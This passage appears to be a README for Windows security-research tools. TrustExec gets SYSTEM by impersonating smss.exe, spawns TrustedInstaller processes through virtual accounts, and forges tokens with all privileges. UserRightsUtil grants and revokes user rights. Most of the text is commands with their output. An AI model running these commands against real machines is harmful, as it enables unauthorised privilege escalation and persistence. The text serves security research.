(c) Microsoft Corporation. All rights reserved.
C:\dev>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
If you set 1
for -t
option, TrustExec
will try to create TrustedInstaller
process with virtual account technique.
This technique creates a virtual accound to impersonate as TrustedInstaller group account as a side effect.
If you don't specify domain name (-d
option), username (-u
) and RID (-i
option), this module create a virtual account DefaultDomain\DefaultUser
.
Default SID for domain is S-1-5-110
and for user is S-1-5-110-110
:
C:\dev>TrustExec.exe -m exec -s -t 1
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2616
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
|-> Domain : DefaultDomain (SID : S-1-5-110)
|-> Username : DefaultUser (SID : S-1-5-110-110)
[+] Added virtual domain and user.
[>] Trying to logon as DefaultDomain\DefaultUser.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
========================= =============
defaultdomain\defaultuser S-1-5-110-110
C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
C:\dev>exit
[>] Exit.
[!] Added virtual domain and user are not removed automatically.
|-> To remove added virtual user SID : TrustExec.exe -m sid -r -d DefaultDomain -u DefaultUser
|-> To remove added virtual domain SID : TrustExec.exe -m sid -r -d DefaultDomain
You can change domain name and username, use -d
option and -u
option.
To change domain RID, use -i
option as follows:
C:\dev>TrustExec.exe -m exec -s -d VirtualDomain -u VirtualAdmin -i 92 -t 1
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3612
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
|-> Domain : VirtualDomain (SID : S-1-5-92)
|-> Username : VirtualAdmin (SID : S-1-5-92-110)
[+] Added virtual domain and user.
[>] Trying to logon as VirtualDomain\VirtualAdmin.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\dev>whoami /user
USER INFORMATION
----------------
User Name SID
========================== ============
virtualdomain\virtualadmin S-1-5-92-110
If you want to execute single command, use -c
option without -s
flag as follows:
C:\dev>TrustExec.exe -m exec -c "whoami /user & whoami /priv"
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 1464
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
[>] Exit.
If you want to enable all available privileges, set -f
flag as follows:
C:\dev>TrustExec.exe -m exec -c "whoami /priv" -f
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2526
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
[>] Exit.
Added domain and username by virtual account technique are not removed automatically.
If you want to remove them, run the sid
module as shown in the last output.
sid Module
This module is to manage virtual account created by this tool:
C:\dev>TrustExec.exe -m sid -h
TrustExec - Help for "sid" command.
Usage: TrustExec.exe -m sid [Options]
-h, --help : Displays this help message.
-a, --add : Flag to add virtual account's SID.
-r, --remove : Flag to remove virtual account's SID.
-d, --domain : Specifies domain name to add or remove. Default value is null.
-u, --username : Specifies username to add or remove. Default value is null.
-i, --id : Specifies RID for virtual domain to add. Default value is "110".
-s, --sid : Specifies SID to lookup.
-l, --lookup : Flag to lookup SID or account name in local system.
To lookup SID, set -l
flag. If you want to lookup domain or username from SID, specify SID with -s
option as follows:
C:\dev>TrustExec.exe -m sid -l -s S-1-5-18
[*] Result:
|-> Account Name : nt authority\system
|-> SID : S-1-5-18
|-> Account Type : SidTypeWellKnownGroup
If you want to lookup SID from domain name, specify domain name with -d
option as follows:
C:\dev>TrustExec.exe -m sid -l -d contoso
[*] Result:
|-> Account Name : contoso
|-> SID : S-1-5-21-3654360273-254804765-2004310818
|-> Account Type : SidTypeDomain
If you want to lookup SID from domain name and username, specify domain name with -d
option and username with -u
option as follows:
C:\dev>TrustExec.exe -m sid -l -d contoso -u david
[*] Result:
|-> Account Name : contoso\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
To remove virutal account, set -r
flag.
Domain name to remove is specified with -d
option, username is specified with -u
option:
C:\dev>TrustExec.exe -m sid -r -d defaultdomain -u defaultuser
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 2568
[+] Impersonation is successful.
[>] Trying to remove SID.
|-> Domain : defaultdomain
|-> Username : defaultuser
[*] SID : S-1-5-110-110.
[+] Requested SID is removed successfully.
C:\dev>TrustExec.exe -m sid -r -d defaultdomain
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 4696
[+] Impersonation is successful.
[>] Trying to remove SID.
|-> Domain : defaultdomain
[*] SID : S-1-5-110.
[+] Requested SID is removed successfully.
WARNING Deleted SIDs may appear to remain until rebooting the OS.
If you want add domain or user SID, set -a
flag as follows:
C:\dev>TrustExec.exe -m sid -a -d virtualworld -u virtualadmin -i 97
[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
|-> Current Thread ID : 3628
[+] Impersonation is successful.
[>] Trying to add virtual domain and user.
|-> Domain : virtualworld (SID : S-1-5-97)
|-> Username : virtualadmin (SID : S-1-5-97-110)
[+] Added virtual domain and user.
C:\dev>TrustExec.exe -m sid -l -s S-1-5-97
[*] Result : virtualworld (SID : S-1-5-97)
C:\dev>TrustExec.exe -m sid -l -s S-1-5-97-110
[*] Result : virtualworld\virtualadmin (SID : S-1-5-97-110)
UserRightsUtil
This tool is to manage user right without secpol.msc
.
Commands other than lookup
require administrator privileges:
C:\dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
enum Module
To enumerate user rights for a specific account, use enum
command with -u
and d opitons or -s
option as follows:
C:\dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSO\jeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:\dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSO\jeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
If you don't specify domain name with -d
option, use local computer name as domain name:
C:\dev>hostname
CL01
C:\dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01\Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
find Module
This command is to find users who have a specific right.
For example, if you want to find users have SeDebugPrivilege
, execute as follows:
C:\dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTIN\Administrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
To list available value for -r
option, use -l
option:
C:\dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
lookup Module
This command is to lookup account SID as follows:
C:\dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSO\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:\dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:\dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSO\Domain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
If you don't specify domain name with -d
option, use local computer name as domain name:
C:\dev>hostname
CL01
C:\dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01\admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
manage Module
This command is to grant or revoke user rights for a specific user account.
To grant user right, specify a user right as the value for -g
option:
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:\dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
To revoke user right, specify a user right as the value for -r
option:
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:\dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:\de>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
To list available value for -g
or -r
option, use -l
option:
C:\dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
Reference
- Priv2Admin and PSBits by Grzegorz Tworek
- Abusing Token Privileges For LPE by Bryan Alexander and Steve Breen
- whoami /priv by Andrea Pierini
- HackSys Extreme Vulnerable Driver by Ashfaq Ansari
Acknowledgments
Thanks for your advices about WinDbg extension programming:
- Pavel Yosifovich (@zodiacon)
Thanks for your notable research:
- Grzegorz Tworek (@0gtweet)
- Bryan Alexander (@dronesec)
- Steve Breen (@breenmachine)
- Andrea Pierini (@decoder_it)
Thanks for your sample kernel driver release:
- Ashfaq Ansari (@HackSysTeam)